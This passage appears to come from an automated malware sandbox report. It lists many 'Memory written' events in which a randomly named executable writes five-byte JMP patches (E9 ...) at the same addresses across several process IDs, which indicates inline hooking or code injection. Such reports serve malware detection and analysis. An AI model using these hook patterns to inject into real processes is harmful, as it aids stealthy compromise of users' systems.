            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2704 base: 756F5366 value: E9 55 BE 99 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2704 base: 756F3EFC value: E9 8F D3 99 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2704 base: 69CBA9B0 value: E9 3B 6D 3D 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2704 base: 69CA572C value: E9 AF C0 3E 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2704 base: 769A6C19 value: E9 32 06 6F 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2704 base: 769A4889 value: E9 82 D4 6E 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2704 base: 76A91D20 value: E9 7B 03 60 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2704 base: 76A0BF10 value: E9 4B 62 68 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2704 base: 76A81610 value: E9 8B 0D 61 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2704 base: 774D0078 value: E9 53 53 BC 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2704 base: 774EEB2A value: E9 D1 67 BA 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2868 base: 774CFA50 value: E9 3B 69 10 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2868 base: 774CFDA8 value: E9 93 68 10 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2868 base: 757158CD value: E9 2E B7 EB 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2868 base: 757182ED value: E9 AE 8D EB 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2868 base: 7576DF21 value: E9 EA 45 E6 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2868 base: 75709AE0 value: E9 8B 8A EC 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2868 base: 756F5366 value: E9 55 BE ED 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2868 base: 756F3EFC value: E9 8F D3 ED 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2868 base: 69CBA9B0 value: E9 3B 6D 91 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2868 base: 69CA572C value: E9 AF C0 92 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2868 base: 769A6C19 value: E9 32 06 C3 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2868 base: 769A4889 value: E9 82 D4 C2 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2868 base: 76A91D20 value: E9 7B 03 B4 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2868 base: 76A0BF10 value: E9 4B 62 BC 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2868 base: 76A81610 value: E9 8B 0D B5 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2868 base: 774D0078 value: E9 53 53 10 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2868 base: 774EEB2A value: E9 D1 67 0E 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 3068 base: 774CFA50 value: E9 3B 69 BC 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 3068 base: 774CFDA8 value: E9 93 68 BC 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 3068 base: 757158CD value: E9 2E B7 97 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 3068 base: 757182ED value: E9 AE 8D 97 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 3068 base: 7576DF21 value: E9 EA 45 92 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 3068 base: 75709AE0 value: E9 8B 8A 98 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 3068 base: 756F5366 value: E9 55 BE 99 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 3068 base: 756F3EFC value: E9 8F D3 99 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 3068 base: 69CBA9B0 value: E9 3B 6D 3D 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 3068 base: 69CA572C value: E9 AF C0 3E 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 3068 base: 769A6C19 value: E9 32 06 6F 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 3068 base: 769A4889 value: E9 82 D4 6E 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 3068 base: 76A91D20 value: E9 7B 03 60 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 3068 base: 76A0BF10 value: E9 4B 62 68 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 3068 base: 76A81610 value: E9 8B 0D 61 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 3068 base: 774D0078 value: E9 53 53 BC 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 3068 base: 774EEB2A value: E9 D1 67 BA 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2684 base: 774CFA50 value: E9 3B 69 44 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2684 base: 774CFDA8 value: E9 93 68 44 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2684 base: 757158CD value: E9 2E B7 1F 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2684 base: 757182ED value: E9 AE 8D 1F 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2684 base: 7576DF21 value: E9 EA 45 1A 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2684 base: 75709AE0 value: E9 8B 8A 20 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2684 base: 756F5366 value: E9 55 BE 21 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2684 base: 756F3EFC value: E9 8F D3 21 8B
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2684 base: 69CBA9B0 value: E9 3B 6D C5 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2684 base: 69CA572C value: E9 AF C0 C6 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2684 base: 769A6C19 value: E9 32 06 F7 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2684 base: 769A4889 value: E9 82 D4 F6 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2684 base: 76A91D20 value: E9 7B 03 E8 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2684 base: 76A0BF10 value: E9 4B 62 F0 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2684 base: 76A81610 value: E9 8B 0D E9 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2684 base: 774D0078 value: E9 53 53 44 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2684 base: 774EEB2A value: E9 D1 67 42 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2688 base: 774CFA50 value: E9 3B 69 EC 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2688 base: 774CFDA8 value: E9 93 68 EC 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2688 base: 757158CD value: E9 2E B7 C7 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2688 base: 757182ED value: E9 AE 8D C7 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2688 base: 7576DF21 value: E9 EA 45 C2 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2688 base: 75709AE0 value: E9 8B 8A C8 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2688 base: 756F5366 value: E9 55 BE C9 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2688 base: 756F3EFC value: E9 8F D3 C9 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2688 base: 69CBA9B0 value: E9 3B 6D 6D 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2688 base: 69CA572C value: E9 AF C0 6E 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2688 base: 769A6C19 value: E9 32 06 9F 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2688 base: 769A4889 value: E9 82 D4 9E 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2688 base: 76A91D20 value: E9 7B 03 90 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2688 base: 76A0BF10 value: E9 4B 62 98 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2688 base: 76A81610 value: E9 8B 0D 91 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2688 base: 774D0078 value: E9 53 53 EC 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2688 base: 774EEB2A value: E9 D1 67 EA 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 774CFA50 value: E9 3B 69 BC 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 774CFDA8 value: E9 93 68 BC 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 757158CD value: E9 2E B7 97 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 757182ED value: E9 AE 8D 97 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 7576DF21 value: E9 EA 45 92 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 75709AE0 value: E9 8B 8A 98 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 756F5366 value: E9 55 BE 99 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 756F3EFC value: E9 8F D3 99 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 69CBA9B0 value: E9 3B 6D 3D 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 69CA572C value: E9 AF C0 3E 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 769A6C19 value: E9 32 06 6F 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 769A4889 value: E9 82 D4 6E 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 76A91D20 value: E9 7B 03 60 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 76A0BF10 value: E9 4B 62 68 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 76A81610 value: E9 8B 0D 61 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 774D0078 value: E9 53 53 BC 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1436 base: 774EEB2A value: E9 D1 67 BA 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 774CFA50 value: E9 3B 69 D5 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 774CFDA8 value: E9 93 68 D5 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 757158CD value: E9 2E B7 B0 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 757182ED value: E9 AE 8D B0 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 7576DF21 value: E9 EA 45 AB 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 75709AE0 value: E9 8B 8A B1 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 756F5366 value: E9 55 BE B2 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 756F3EFC value: E9 8F D3 B2 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 69CBA9B0 value: E9 3B 6D 56 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 69CA572C value: E9 AF C0 57 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 769A6C19 value: E9 32 06 88 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 769A4889 value: E9 82 D4 87 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 76A91D20 value: E9 7B 03 79 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 76A0BF10 value: E9 4B 62 81 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 76A81610 value: E9 8B 0D 7A 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 774D0078 value: E9 53 53 D5 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1452 base: 774EEB2A value: E9 D1 67 D3 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 774CFA50 value: E9 3B 69 C8 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 774CFDA8 value: E9 93 68 C8 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 757158CD value: E9 2E B7 A3 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 757182ED value: E9 AE 8D A3 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 7576DF21 value: E9 EA 45 9E 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 75709AE0 value: E9 8B 8A A4 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 756F5366 value: E9 55 BE A5 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 756F3EFC value: E9 8F D3 A5 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 69CBA9B0 value: E9 3B 6D 49 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1060 base: 69CA572C value: E9 AF C0 4A 96
